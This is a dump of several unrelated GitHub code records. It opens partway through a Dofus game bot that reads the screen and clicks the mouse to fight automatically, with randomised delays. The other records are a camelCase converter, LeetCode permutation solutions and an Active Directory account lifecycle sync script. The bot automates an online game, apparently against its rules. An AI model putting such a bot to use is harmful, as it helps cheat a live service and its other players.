cv2.cvtColor(color, cv2.COLOR_RGB2HSV)\n\n lower_limit = np.array([hsv_color[0][0][0]-tol, hsv_color[0][0][1]-tol, hsv_color[0][0][2]-tol])\n upper_limit = np.array([hsv_color[0][0][0]+tol, hsv_color[0][0][1]+tol, hsv_color[0][0][2]+tol])\n\n frame = pyautogui.screenshot()\n hsv = cv2.cvtColor(np.array(frame), cv2.COLOR_RGB2HSV)\n mask = cv2.inRange(hsv, lower_limit, upper_limit)\n\n height, width = mask.shape\n U = (28.2, 14)\n V = (28.2, -14)\n porte = 11\n obstacle_dico = {}\n for i in range(-porte, porte+1):\n porte2 = porte - abs(i)\n for j in range(-porte2, porte2 + 1):\n actuel = (np.int64(origine[0] + i * U[0] + j*V[0]), np.int64(origine[1] + i * U[1] + j*V[1]))\n zone_chercher = np.zeros((height, width, 1), np.uint8)\n initial = (actuel[0] - dX, actuel[1] - dY)\n final = (actuel[0] + dX, actuel[1] + dY)\n # print(initial,final)\n cv2.rectangle(zone_chercher, initial, final, (255), -1)\n res = cv2.bitwise_and(zone_chercher, zone_chercher, mask=mask)\n result1, result2 = np.where(res == 255)\n if(len(result1)):\n obstacle_dico[(i, j)] = True\n # else:\n # obstacle_dico[(i,j)] = False\n return obstacle_dico\n # frame2 = cv2.cvtColor(np.array(frame), cv2.COLOR_RGB2BGR)\n # for i in obstacle_dico.keys():\n # if obstacle_dico[i]:\n # actuel = (np.int64(origine[0] + i[0] * U[0] + i[1]*V[0]), np.int64(origine[1] + i[0] * U[1] + i[1]*V[1]))\n # cv2.rectangle(frame2,(actuel[0] - 2,actuel[1] - 2),(actuel[0] 
+ 2,actuel[1] + 2),(255,255,255),-1)\n    #\n    # cv2.imshow('frame',frame2)\n    # k = cv2.waitKey()\n\n\ndef findpath(obstacleexterne, pos, but):\n    try:\n        obstacle_dico = copy.deepcopy(obstacleexterne)\n        obstacle_dico[but] = True\n        libre = list(obstacle_dico.keys())\n        if pos in libre:\n            libre.remove(pos)\n        list_pos_actuelle = [pos]\n        list_pos_nouvelle = []\n        dico_pos = {pos: 0}\n        accessible = []\n        for i in range(1, 31):\n            for j in list_pos_actuelle:\n                for k in voisin(j):\n                    if k in libre:\n                        libre.remove(k)\n                        dico_pos[k] = i\n                        list_pos_nouvelle.append(k)\n                        accessible.append(k)\n            if not (but in libre):\n                break\n            list_pos_actuelle = list_pos_nouvelle\n            list_pos_nouvelle = []\n\n        pos_actuelle = but\n        path = []\n        if not (but in accessible):\n            dist_min = 1000\n            for i in accessible:\n                if (abs(but[0]-i[0]) + abs(but[1]-i[1])) < dist_min:\n                    dist_min = (abs(but[0]-i[0]) + abs(but[1]-i[1]))\n                    pos_actuelle = i\n\n        for i in range(dico_pos[pos_actuelle]-1, 0, -1):\n            for j in voisin(pos_actuelle):\n                try:\n                    if dico_pos[j] == i:\n                        path.append(j)\n                        pos_actuelle = j\n                        break\n                except:\n                    continue\n        return path\n    except:\n        return []\n\n\ndef voisin(pos):\n    return [(pos[0]+1, pos[1]), (pos[0]-1, pos[1]), (pos[0], pos[1]+1), (pos[0], pos[1]-1)]\n\ndef ligne_de_vue(obstacle, pos,but):\n    try:\n        obstacle_dico = copy.deepcopy(obstacle)\n        obstacle_dico[pos] = True\n        obstacle_dico[but] = True\n        dist = abs(but[1]-pos[1]) + abs(but[0]-pos[0])\n        if (but[0]-pos[0]) == 0:\n            dX = np.arange(0, but[1]-pos[1], ((but[1]-pos[1])/dist))\n            pente = (but[0]-pos[0])/(but[1]-pos[1])\n            X = np.arange(pos[1], but[1], ((but[1]-pos[1])/dist))\n        else:\n            dX = np.arange(0, but[0]-pos[0], ((but[0]-pos[0])/dist))\n            pente = (but[1]-pos[1])/(but[0]-pos[0])\n            X = np.arange(pos[0], but[0], ((but[0]-pos[0])/dist))\n        Y = []\n        for i in dX:\n            Y.append(pente*i + pos[1])\n\n        # print(X)\n        # print(Y)\n        for i in range(len(X)):\n            try:\n                if (but[0]-pos[0]) == 0:\n                    obstacle_dico[(round(Y[i]), round(X[i]))]\n                else:\n                    obstacle_dico[(round(X[i]), round(Y[i]))]\n            except:\n                return False\n        return True\n    except:\n        return False\n\n\ndef pos_abs_2_rel(pos, origine):\n    # U = (36.3, 18.1)\n    # V = (36.3,-18.1)\n    dX = 28.2\n    dY = 14\n\n    X = round((pos[0] - origine[0])/dX)\n    Y = round((pos[1] - origine[1])/dY)\n\n    a = (X + Y)/2\n    b = X - a\n    return (a,b)\n\ndef pos_rel_2_abs(pos, origine):\n    U = (28.2, 14)\n    V = (28.2, -14)\n    pos_abs = (np.int64(origine[0] + pos[0] * U[0] + pos[1] * V[0]), np.int64(origine[1] + pos[0] * U[1] + pos[1] * V[1]))\n    return pos_abs\n\ndef modeTacticCreature(pause= [False]):\n    if(divers.findcolor((173, 173, 173),(872, 686),(879, 693))):\n        divers.move_mouse(872, 686,6,7, vitesse=1.5, pause= pause)\n        time.sleep(0.8 + random.random() * 0.5)\n\n    if(divers.findcolor((173, 173, 173),(891, 686),(897, 693))):\n        divers.move_mouse(891,686,6,7, vitesse=1.5, pause= pause)\n        time.sleep(0.8 + random.random() * 0.5)\n    return\n\ndef combat(option, pause= [False]):\n    try:\n        ColorNextTurn = (213, 243, 0)\n        #cra = [(253, 190, 45),(216, 138, 22),(119, 74, 2)]# Enutrof colors\n        cra = [(253, 57, 36), (196, 19, 0), (101, 11, 1)]# Cra colors\n        creature = [(77, 77, 93), (46, 54, 61), (126, 126, 142)]\n        Sort_Sans_Vue = (595, 667)\n        Sort_Avec_Vue = (621, 667)\n        PO_Sort = option.po\n        pm = option.pm\n\n        pos_ennemi = (0, 0)\n        obst = {}\n        if divers.findcolor(ColorNextTurn, (882, 646), (949, 669)):\n            bool_fini = (1, 570, 433)\n            modeTacticCreature()\n            ColorEndFight = (191, 230, 0)\n            pos_perso = findperso(cra[0], cra[1], cra[2])\n            if (pos_perso == None):\n                pos_perso = findperso(cra[0], cra[1], cra[2])\n            origine = (pos_perso[0]+2, pos_perso[1]+15)\n\n        while(True):\n            modeTacticCreature()\n            # starts the fight on the first turn, then passes the turn afterwards\n            for i in range(0, 20):\n                time.sleep(0.3)\n                if divers.findcolor(ColorNextTurn, (882, 646), (949, 669)):\n                    break\n                if combat_fini()[0] == 1:\n                    i = 19\n                    bool_fini = combat_fini()\n                    break\n                if ((i+1) % 10) == 0:\n                    divers.move_mouse(262, 694, 100, 4, alea=False, pause=pause)\n            if i == 19:\n                break\n\n            divers.move_mouse(882, 646, 65, 20, alea=False, pause=pause)\n            divers.move_mouse(1083, 388, 150, 160, alea=False, pause=pause)\n\n            # wait for our turn to play\n            for i in range(0, 50):\n                time.sleep(0.3)\n                if divers.findcolor(ColorNextTurn, (882, 646), (949, 669)):\n                    break\n                if combat_fini()[0] == 1:\n                    i = 49\n                    bool_fini = combat_fini()\n                    break\n                if ((i + 1) % 15) == 0:\n                    divers.move_mouse(262, 694, 100, 4, alea=False, pause=pause)\n            if i == 49:\n                break\n\n            # click the spell that needs no line of sight\n            bool_sort = False\n            if not(pos_ennemi in list(obst.keys())):\n                bool_sort = True\n                divers.move_mouse(Sort_Sans_Vue[0], Sort_Sans_Vue[1], 13, 14, vitesse=2, alea=False, pause=pause)\n                divers.move_mouse(72, 146, 130, 450, Click=0, vitesse=3, alea=False, pause=pause)\n                obst = obstacle(origine)\n                # divers.move_mouse(70, 475, 100, 230, vitesse = 2, pause= pause)\n\n            pos_perso = findperso(cra[0], cra[1], cra[2])\n            if pos_perso == None:\n                pos_perso = findperso(cra[0], cra[1], cra[2])\n\n            pos_ennemi = findperso(creature[0], creature[1], creature[2])\n            if pos_ennemi == None:\n                pos_ennemi = findperso(creature[0], creature[1], creature[2])\n            if pos_ennemi == None:\n                break\n            pos_perso = (pos_perso[0]+2, pos_perso[1] + 19)\n            pos_ennemi = (pos_ennemi[0]+2, pos_ennemi[1] + 19)\n            pos_perso = pos_abs_2_rel(pos_perso, origine)\n            pos_ennemi = pos_abs_2_rel(pos_ennemi, origine)\n\n            dist = abs(pos_perso[0]-pos_ennemi[0]) + abs(pos_perso[1]-pos_ennemi[1])\n            # if too far, get closer\n            if dist > PO_Sort:\n                # cancel the spell click so we can move\n                if bool_sort:\n                    bool_sort = False\n                    divers.move_mouse(72, 146, 130, 450, vitesse=2, pause= pause)\n                path = findpath(obst, pos_perso, pos_ennemi)\n                if len(path) < pm:\n                    pm = len(path)\n                Go_to = pos_rel_2_abs(path[len(path)-pm], origine)\n                divers.move_mouse(Go_to[0]-6, Go_to[1]-4, 6, 6, vitesse=2, pause=pause)\n                pos_perso = path[len(path)-5]\n                dist = abs(pos_perso[0]-pos_ennemi[0]) + abs(pos_perso[1]-pos_ennemi[1])\n\n            if dist <= PO_Sort:\n                if ligne_de_vue(obst, pos_perso, pos_ennemi):\n                    Go_to = pos_rel_2_abs(pos_ennemi, origine)\n\n                    divers.move_mouse(Sort_Avec_Vue[0], Sort_Avec_Vue[1], 13, 14, alea=False, vitesse=2, pause=pause)\n                    divers.move_mouse(Go_to[0]-6, Go_to[1]-4, 9, 6, alea=False, vitesse=2, pause=pause)\n\n                    time.sleep(0.3 + random.random() * 0.3)\n                    if combat_fini()[0] == 1:\n                        bool_fini = combat_fini()\n                        break\n\n                    divers.move_mouse(Sort_Avec_Vue[0], Sort_Avec_Vue[1], 13, 14, alea=False, vitesse=2, pause=pause)\n                    if combat_fini()[0] == 1:\n                        bool_fini = combat_fini()\n                        break\n                    divers.move_mouse(Go_to[0]-6, Go_to[1]-4, 9, 6, vitesse=2, pause= pause)\n                # spell with line of sight\n                # 2nd spell with line of sight\n                else:\n                    Go_to = pos_rel_2_abs(pos_ennemi,origine)\n                    if (not(bool_sort)):\n                        divers.move_mouse(Sort_Sans_Vue[0], Sort_Sans_Vue[1], 13, 14,alea=False, vitesse=2, pause= pause)\n                    divers.move_mouse(Go_to[0]-6, Go_to[1]-4, 9, 6, alea=False, vitesse=2, pause=pause)\n\n                    time.sleep(0.3 + random.random() * 0.3)\n                    if combat_fini()[0] == 1:\n                        bool_fini = combat_fini()\n                        break\n\n                    divers.move_mouse(Sort_Sans_Vue[0], Sort_Sans_Vue[1], 13, 14, alea=False, 
vitesse=2, pause=pause)\n if combat_fini()[0] == 1:\n bool_fini = combat_fini()\n break\n divers.move_mouse(Go_to[0]-6, Go_to[1]-4, 9, 6, vitesse=2, pause=pause)\n\n time.sleep(0.3 + random.random() * 0.3)\n divers.move_mouse(bool_fini[1], bool_fini[2], 60, 10, alea=False, pause=pause)\n except:\n return\n\n","repo_name":"bebeh3176/Farming_sim","sub_path":"BOT_Dofus/Divers/Combat.py","file_name":"Combat.py","file_ext":"py","file_size_in_byte":14065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
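findpath() above is a breadth-first flood fill over walkable cells followed by a backward walk along decreasing distance labels. A self-contained sketch of the same idea on a plain coordinate grid; the grid and names here are illustrative, not the bot's isometric map or API.

from collections import deque

def bfs_path(walkable, start, goal):
    # forward pass: label every reachable cell with its BFS distance
    dist = {start: 0}
    queue = deque([start])
    while queue:
        cell = queue.popleft()
        if cell == goal:
            break
        x, y = cell
        for nxt in ((x+1, y), (x-1, y), (x, y+1), (x, y-1)):
            if nxt in walkable and nxt not in dist:
                dist[nxt] = dist[cell] + 1
                queue.append(nxt)
    if goal not in dist:
        return []  # unreachable
    # backward pass: from the goal, always step to a neighbour one label lower
    path, cell = [goal], goal
    while dist[cell] > 0:
        x, y = cell
        for prev in ((x+1, y), (x-1, y), (x, y+1), (x, y-1)):
            if dist.get(prev) == dist[cell] - 1:
                path.append(prev)
                cell = prev
                break
    return path[::-1]

cells = {(x, y) for x in range(5) for y in range(5)} - {(1, 1), (1, 2), (1, 3)}
print(bfs_path(cells, (0, 2), (3, 2)))  # route around the wall at x == 1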
+{"seq_id":"34621481689","text":"# prompts the user for the name of a variable in camel case\ncamel_text = input(\"camelCase: \").strip()\n\n# assign the first char of the camel case\nsnake_text = camel_text[0]\n\n# check the first letter in input\nfor char in camel_text[1:]:\n # check if first letter is upper\n if char.isupper():\n # add \"_\" at the beginning of the uppercase char then make it lowercase\n snake_text += \"_\" + char.lower()\n else:\n snake_text += char.lower()\n# outputs the corresponding name in snake case.\nprint(f\"snake_case: {snake_text}\")","repo_name":"patricktenorio/CS50P_complete_course","sub_path":"week_2/camel/camel.py","file_name":"camel.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"7699722188","text":"from collections import deque\n\nclass Solution:\n def permute(self, nums: List[int]) -> List[List[int]]:\n \n # []\n # [1]\n # [1,2], [2,1]\n # [3,1,2], [1,3,2], [1,2,3], [3,2,1], [2,3,1], [2,1,3]\n \n res = [] # [3,2,1], [2,3,1], [2,1,3]\n que = deque([])\n que += [],\n \n for num in nums: #3\n n = len(que) # 2, [2,1] [1,2]\n for _ in range(n): # 2\n oldPerm = que.popleft() # [2,1]\n for i in range(len(oldPerm)+1): # 0,1,2\n newPerm = oldPerm[:] # [2,1]\n newPerm.insert(i, num) # \n if len(newPerm) == len(nums):\n res += newPerm,\n else:\n que += newPerm, # []\n \n return res\n\n# Second attempt\n\nfrom collections import deque\n\nclass Solution:\n def permute(self, nums: List[int]) -> List[List[int]]:\n # use bit manipulation\n # use bfs method \n \n # BFS method\n # when len == 3: add to res\n # [] -> [1] -> [2,1] [1,2] -> [3,2,1], [2,3,1], [2,1,3], [3,1,2], [1,3,2], [1,2,3]\n \n que = deque([[]])\n res = []\n idx = 0\n while len(que):\n # print(que)\n for x in range(len(que)): # 1\n temp = que.popleft() # [1]\n # print(\"temp\", temp)\n if len(temp) == len(nums):\n res += temp,\n break\n\n for i in range(len(temp)+1): # 2\n newList = temp[:i] + [nums[idx]] + temp[i:]\n # print(newList)\n que += newList,\n\n idx+=1\n \n return res","repo_name":"DarshanGowda0/LC-Grind","sub_path":"Daily-Grind/56.py","file_name":"56.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"27192554420","text":"import logging\nimport typing\nimport uuid\nfrom functools import lru_cache\nfrom functools import partial\nfrom functools import wraps\nfrom operator import itemgetter\nfrom typing import Any\nfrom typing import Callable\nfrom typing import Dict\nfrom typing import Iterator\nfrom typing import List\nfrom typing import Optional\nfrom typing import Tuple\n\nimport click\nimport sentry_sdk\nfrom ra_utils.apply import apply\nfrom ra_utils.catchtime import catchtime\nfrom ra_utils.jinja_filter import create_filters\nfrom ra_utils.lazy_dict import LazyDict\nfrom ra_utils.lazy_dict import LazyEval\nfrom ra_utils.lazy_dict import LazyEvalBare\nfrom ra_utils.load_settings import load_settings\nfrom ra_utils.tqdm_wrapper import tqdm\n\nfrom .ad_exceptions import NoActiveEngagementsException\nfrom .ad_exceptions import NoPrimaryEngagementException\nfrom .ad_logger import start_logging\nfrom .ad_reader import ADParameterReader\nfrom .ad_writer import ADWriter\nfrom .read_ad_conf_settings import injected_settings\nfrom exporters.sql_export.gql_lora_cache_async import GQLLoraCache\nfrom exporters.sql_export.lora_cache import get_cache as LoraCache\nfrom exporters.sql_export.old_lora_cache import OldLoraCache\n\nlogger = logging.getLogger(\"CreateAdUsers\")\nexport_logger = logging.getLogger(\"export\")\n\nFilterFunction = Callable[[Tuple[Dict, Dict]], bool]\n\n\nclass AdLifeCycle:\n def __init__(\n self, read_from_cache: bool = True, skip_occupied_names_check: bool = False\n ) -> None:\n logger.info(\"AD Sync Started\")\n self._settings = self._load_settings()\n\n self.roots = self._settings[\"integrations.ad.write.create_user_trees\"]\n\n self.stats = self._gen_stats()\n\n self.create_filters = self._load_jinja_filters(\"create_filters\")\n self.disable_filters = self._load_jinja_filters(\"disable_filters\")\n\n self.ad_reader = self._get_adreader()\n\n # This is a potentially slow step (since it may read LoraCache)\n print(\"Retrive LoRa dump\")\n with catchtime() as t:\n self.lc, self.lc_historic = self._update_lora_cache(dry_run=read_from_cache)\n print(\"Done with LoRa caching: {}\".format(t()))\n\n # Create a set of users with engagements for faster filtering\n engagements = self.lc_historic.engagements.values()\n self.users_with_engagements = set(map(lambda eng: eng[0][\"user\"], engagements))\n\n print(\"Retrieve AD Writer name list\")\n with catchtime() as t:\n self.ad_writer = self._get_adwriter(\n lc=self.lc,\n lc_historic=self.lc_historic,\n skip_occupied_names=skip_occupied_names_check,\n all_settings=injected_settings(\"ad_lifecycle_injected_settings\"),\n )\n print(\"Done with AD Writer init: {}\".format(t()))\n\n logger.debug(\"__init__() done\")\n\n def _load_settings(self):\n return load_settings()\n\n def _load_jinja_filters(self, source: str) -> List[Callable]:\n seeded_create_filters = partial(\n create_filters, tuple_keys=(\"employee\", \"ad_object\")\n )\n setting_name = f\"integrations.ad.lifecycle.{source}\"\n filter_templates = self._settings.get(setting_name, [])\n return [\n # Decorate each `filter_func` so it will log skipped users under\n # a name such as \"create_filters_num_0\", etc.\n self.log_skipped(f\"{source}_num_{num}\")(filter_func)\n for num, filter_func in enumerate(seeded_create_filters(filter_templates))\n ]\n\n def _get_adreader(self):\n reader = ADParameterReader()\n reader.cache_all(print_progress=True)\n return reader\n\n def _get_adwriter(self, **kwargs):\n return ADWriter(**kwargs)\n\n def log_skipped(self, filtername):\n 
\"\"\"Return decorated version of a filter function taking a single\n `tup` arg, which is an `(employee, ad_object)` tuple.\n If the filter function returns `False`, store the result in the\n `stats[\"skipped\"][filtername]` dictionary by the employee UUID.\n \"\"\"\n\n def get_employee_name(employee):\n if \"name\" in employee:\n return \" \".join(employee[\"name\"])\n elif \"navn\" in employee:\n return employee[\"navn\"]\n else:\n return \"unknown\"\n\n def decorator(f):\n @wraps(f)\n def wrapper(tup):\n # Call the filter function saving its status\n status = f(tup)\n if status is False:\n skipped = self.stats.setdefault(\"skipped\", {})\n users = skipped.setdefault(filtername, {})\n # Add user UUID to dictionary (name is used for the value)\n employee = tup[0]\n users[employee[\"uuid\"]] = get_employee_name(employee)\n return status\n\n return wrapper\n\n return decorator\n\n def _update_lora_cache(\n self, dry_run: bool = True\n ) -> Tuple[\n typing.Union[OldLoraCache, GQLLoraCache],\n typing.Union[OldLoraCache, GQLLoraCache],\n ]:\n \"\"\"\n Read all information from AD and LoRa.\n :param dry_run: If True, LoRa dump will be read from cache.\n \"\"\"\n lc = LoraCache(resolve_dar=True, full_history=False)\n lc.populate_cache(dry_run=dry_run, skip_associations=True)\n lc.calculate_derived_unit_data()\n lc.calculate_primary_engagements()\n\n lc_historic = LoraCache(resolve_dar=True, full_history=True, skip_past=True)\n lc_historic.populate_cache(dry_run=dry_run, skip_associations=True)\n\n return lc, lc_historic\n\n def _gen_stats(self) -> Dict[str, Any]:\n return {\n \"critical_errors\": 0,\n \"engagement_not_found\": 0,\n \"created_users\": 0,\n \"disabled_users\": 0,\n \"already_in_ad\": 0,\n \"no_active_engagements\": 0,\n \"not_in_user_tree\": 0,\n \"create_filtered\": 0,\n \"users\": set(),\n }\n\n @apply\n def _find_user_unit_tree(self, user: dict, ad_object: dict) -> bool:\n try:\n (\n employment_number,\n title,\n eng_org_unit_uuid,\n eng_uuid,\n ) = self.ad_writer.datasource.find_primary_engagement(user[\"uuid\"])\n except (NoActiveEngagementsException, NoPrimaryEngagementException):\n logger.warning(\n \"Warning: Unable to find primary for {}!\".format(user[\"uuid\"])\n )\n return False\n\n logger.debug(\"Primary found, now find org unit location\")\n\n try:\n unit = self.lc.units[eng_org_unit_uuid][0]\n except KeyError:\n logger.warning(\n \"cannot find unit %r (user=%r)\", eng_org_unit_uuid, user[\"uuid\"]\n )\n return False\n\n # Walk up the organisation unit tree, starting at `unit[\"parent\"]`.\n # Stop when we find an allowed root node, or if we encounter a node\n # without a parent (must be root?)\n looking = True\n while looking:\n if unit[\"uuid\"] in self.roots:\n return True\n if unit[\"parent\"] is None:\n return False\n\n if unit[\"parent\"] in self.lc.units:\n unit = self.lc.units[unit[\"parent\"]][0]\n else:\n logger.warning(\n \"cannot find parent unit %r (user=%r)\", unit[\"parent\"], user[\"uuid\"]\n )\n looking = False\n\n return False\n\n def _get_filter_users_outside_unit_tree(self):\n \"\"\"Return predicate which filter MO users outside the specified unit tree (aka.\n \"user_trees\".)\n \"\"\"\n\n @self.log_skipped(\"filter_users_outside_unit_tree\")\n def filter_users_outside_unit_tree(tup):\n status = self._find_user_unit_tree(tup)\n if status is False:\n self.stats[\"not_in_user_tree\"] += 1\n return status\n\n return filter_users_outside_unit_tree\n\n def _gen_filtered_employees(\n self, in_filters: Optional[List[FilterFunction]] = None\n ):\n def 
enrich_with_ad_user(mo_employee: dict) -> Tuple[Dict, Dict]:\n \"\"\"Enrich mo_employee with AD employee dictionary.\"\"\"\n cpr = mo_employee[\"cpr\"]\n ad_object = self.ad_reader.read_user(cpr=cpr, cache_only=True)\n return mo_employee, ad_object\n\n @lru_cache(maxsize=0)\n def get_engagements() -> List[LazyDict]:\n \"\"\"Produce a list of engagements with lazily evaluated properties.\"\"\"\n\n def make_class_lazy(class_attribute: str, mo_engagement: dict) -> dict:\n \"\"\"Create a lazily evaluated class property.\"\"\"\n class_uuid = mo_engagement[class_attribute]\n mo_engagement[class_attribute + \"_uuid\"] = class_uuid\n mo_engagement[class_attribute] = LazyEvalBare(\n lambda: {\n **self.lc.classes[class_uuid],\n \"uuid\": class_uuid,\n }\n )\n return mo_engagement\n\n lc_engagements: List[\n List[Dict]\n ] = self.lc.engagements.values() # type:ignore\n engagements: Iterator[Dict] = map(itemgetter(0), lc_engagements)\n lazy_engagements: Iterator[LazyDict] = map(LazyDict, engagements)\n enriched_engagements: Iterator[LazyDict] = map(\n # Enrich engagement_type class\n partial(make_class_lazy, \"engagement_type\"),\n map(\n # Enrich primary_type class\n partial(make_class_lazy, \"primary_type\"),\n map(\n # Enrich job_function class\n partial(make_class_lazy, \"job_function\"),\n lazy_engagements,\n ),\n ),\n )\n return list(enriched_engagements)\n\n def enrich_with_engagements(mo_employee: dict) -> LazyDict:\n \"\"\"Enrich mo_employee with lazy engagement information.\n\n The list of engagements is itself lazy, so this code is essentially free\n when it is not in use.\n \"\"\"\n # Turn mo_employee into a lazy dict and add lazy properties\n lazy_employee: LazyDict = LazyDict(mo_employee)\n\n lazy_employee[\"engagements\"] = LazyEvalBare(\n lambda: list(\n filter(\n lambda engagement: engagement[\"user\"] == mo_employee[\"uuid\"],\n get_engagements(),\n )\n )\n )\n\n lazy_employee[\"primary_engagement\"] = LazyEval(\n lambda key, dictionary: next(\n filter(\n lambda engagement: engagement.get(\"primary_boolean\", False),\n dictionary[\"engagements\"],\n ),\n None,\n )\n )\n\n return lazy_employee\n\n filters: List[FilterFunction] = in_filters or []\n\n lc_employees: List[List[Dict]] = self.lc.users.values() # type:ignore\n nonempty_employees = filter(lambda val: len(val) > 0, lc_employees)\n tqdm_employees: List[List[Dict]] = tqdm(nonempty_employees)\n # From employee_effects --> employees\n employees: Iterator[Dict] = map(itemgetter(0), tqdm_employees)\n\n # Enrich with engagements\n ee_employees: Iterator[Dict] = map(enrich_with_engagements, employees)\n\n # Enrich with ad_objects\n ad_employees: Iterator[Tuple[Dict, Dict]] = map(\n enrich_with_ad_user, ee_employees\n )\n\n # Apply requested filters\n for filter_func in filters:\n ad_employees = filter(filter_func, ad_employees)\n return ad_employees\n\n def disable_ad_accounts(self, dry_run: bool = False) -> Dict[str, Any]:\n \"\"\"Iterate over all users and disable non-active AD accounts.\"\"\"\n\n @apply\n def filter_user_not_in_ad(employee: dict, ad_object: dict) -> bool:\n in_ad = bool(ad_object)\n if not in_ad:\n logger.debug(\"User {} does not have an AD account\".format(employee))\n return False\n return True\n\n @apply\n def filter_user_has_engagements(employee: dict, ad_object: dict) -> bool:\n # Check the user does not have a valid engagement:\n # TODO: Consider using the lazy properties for this\n if employee[\"uuid\"] in self.users_with_engagements:\n logger.debug(\"User {} is active - do not touch\".format(employee))\n 
return False\n return True\n\n employees = self._gen_filtered_employees(\n [\n # Remove users that does not exist in AD\n filter_user_not_in_ad,\n # Remove users that have active engagements\n filter_user_has_engagements,\n # Remove users outside the unit tree\n self._get_filter_users_outside_unit_tree(),\n ]\n + self.disable_filters\n )\n # Employees now contain only employees which should be disabled\n for employee, ad_object in employees:\n logger.debug(\"This user has no active engagemens, we should disable\")\n # This user has an AD account, but no engagements - disable\n sam = ad_object[\"SamAccountName\"]\n status = True\n message = \"dry-run\"\n if not dry_run:\n status, message = self.ad_writer.enable_user(username=sam, enable=False)\n if status:\n logger.debug(\"Disabled: {}\".format(sam))\n self.stats[\"disabled_users\"] += 1\n self.stats[\"users\"].add(employee[\"uuid\"])\n else:\n logger.warning(\"enable_user call failed!\")\n logger.warning(message)\n self.stats[\"critical_errors\"] += 1\n\n return self.stats\n\n def create_ad_accounts(self, dry_run: bool = False) -> Dict[str, Any]:\n \"\"\"Iterate over all users and create missing AD accounts.\"\"\"\n\n @self.log_skipped(\"filter_user_already_in_ad\")\n @apply\n def filter_user_already_in_ad(employee, ad_object):\n in_ad = bool(ad_object)\n if in_ad:\n self.stats[\"already_in_ad\"] += 1\n logger.debug(\"User {} is already in AD\".format(employee))\n return False\n return True\n\n @self.log_skipped(\"filter_user_without_engagements\")\n @apply\n def filter_user_without_engagements(employee, ad_object):\n # TODO: Consider using the lazy properties for this\n if employee[\"uuid\"] not in self.users_with_engagements:\n self.stats[\"no_active_engagements\"] += 1\n logger.debug(\n \"User {} has no active engagements - skip\".format(employee)\n )\n return False\n return True\n\n def run_create_filters(tup):\n status = all(create_filter(tup) for create_filter in self.create_filters)\n if status is False:\n self.stats[\"create_filtered\"] += 1\n return status\n\n employees = self._gen_filtered_employees(\n [\n # Remove users that already exist in AD\n filter_user_already_in_ad,\n # Remove users that have no active engagements at all\n filter_user_without_engagements,\n # Check if the user is in a create-user sub-tree\n self._get_filter_users_outside_unit_tree(),\n # Run all create_filters\n run_create_filters,\n ]\n )\n # Employees now contain only employees which should be created\n for employee, ad_object in employees:\n logger.debug(\"Create account for {}\".format(employee))\n try:\n # Create user without manager to avoid risk of failing\n # if manager is not yet in AD. 
The manager will be attached\n # by the next round of sync.\n status = True\n message = \"dry-run\"\n status, message = self.ad_writer.create_user(\n employee[\"uuid\"], create_manager=False, dry_run=dry_run\n )\n if status:\n logger.debug(\"New username: {}\".format(message))\n self.stats[\"created_users\"] += 1\n self.stats[\"users\"].add(employee[\"uuid\"])\n else:\n logger.warning(\"create_user call failed!\")\n logger.warning(message)\n self.stats[\"critical_errors\"] += 1\n except NoPrimaryEngagementException:\n logger.exception(\"No engagment found!\")\n self.stats[\"engagement_not_found\"] += 1\n except Exception as e:\n logger.exception(\"Unknown error!\")\n export_logger.error(\n \"Error creating AD user for MO user %r: %r\",\n employee[\"uuid\"],\n e,\n )\n self.stats[\"critical_errors\"] += 1\n\n return self.stats\n\n\ndef write_stats(stats: Dict[str, Any]) -> None:\n logger.info(\"Stats: {}\".format(stats))\n stats[\"users\"] = \"Written in log file\"\n print(stats)\n\n\ndef run_preview_command_for_uuid(sync: AdLifeCycle, mo_uuid: str):\n commands = sync.ad_writer._preview_create_command(\n mo_uuid, ad_dump=None, create_manager=False\n )\n for cmd in commands:\n click.echo_via_pager(cmd)\n return commands\n\n\n@click.command()\n@click.option(\n \"--create-ad-accounts\",\n default=False,\n is_flag=True,\n help=\"Create AD Users.\",\n type=click.BOOL,\n)\n@click.option(\n \"--disable-ad-accounts\",\n default=False,\n is_flag=True,\n help=\"Disable AD Users.\",\n type=click.BOOL,\n)\n@click.option(\n \"--dry-run\",\n default=False,\n is_flag=True,\n help=\"Dry-run without changes.\",\n type=click.BOOL,\n)\n@click.option(\"--read-from-cache\", is_flag=True, envvar=\"USE_CACHED_LORACACHE\")\n@click.option(\n \"--skip-occupied-names-check\",\n default=False,\n is_flag=True,\n help=\"Skip reading all current user names from AD. 
Only for testing!\",\n type=click.BOOL,\n)\n@click.option(\n \"--preview-command-for-uuid\",\n help=\"Given a MO user UUID, preview the PowerShell command to be run\",\n type=click.STRING,\n)\ndef ad_life_cycle(\n create_ad_accounts: bool,\n disable_ad_accounts: bool,\n dry_run: bool,\n read_from_cache: bool,\n skip_occupied_names_check: bool,\n preview_command_for_uuid: Optional[uuid.UUID],\n) -> None:\n \"\"\"Create or disable users.\"\"\"\n logger.debug(\n \"Running ad_life_cycle with: {}\".format(\n {\n \"create_ad_accounts\": create_ad_accounts,\n \"disable_ad_accounts\": disable_ad_accounts,\n \"dry_run\": dry_run,\n \"read_from_cache\": read_from_cache,\n }\n )\n )\n\n sync = AdLifeCycle(\n read_from_cache=read_from_cache,\n skip_occupied_names_check=skip_occupied_names_check,\n )\n\n if \"crontab.SENTRY_DSN\" in sync._settings:\n sentry_sdk.init(dsn=sync._settings[\"crontab.SENTRY_DSN\"])\n\n if preview_command_for_uuid:\n run_preview_command_for_uuid(sync, str(preview_command_for_uuid))\n return\n\n if not any([create_ad_accounts, disable_ad_accounts]):\n raise click.ClickException(\n \"Either create_ad_accounts or disable_ad_accounts must be given!\"\n )\n\n if create_ad_accounts:\n stats = sync.create_ad_accounts(dry_run)\n write_stats(stats)\n\n if disable_ad_accounts:\n stats = sync.disable_ad_accounts(dry_run)\n write_stats(stats)\n\n\nif __name__ == \"__main__\":\n start_logging(export_log_file=\"AD_life_cycle.log\")\n ad_life_cycle()\n","repo_name":"OS2mo/os2mo-data-import-and-export","sub_path":"integrations/ad_integration/ad_life_cycle.py","file_name":"ad_life_cycle.py","file_ext":"py","file_size_in_byte":20093,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
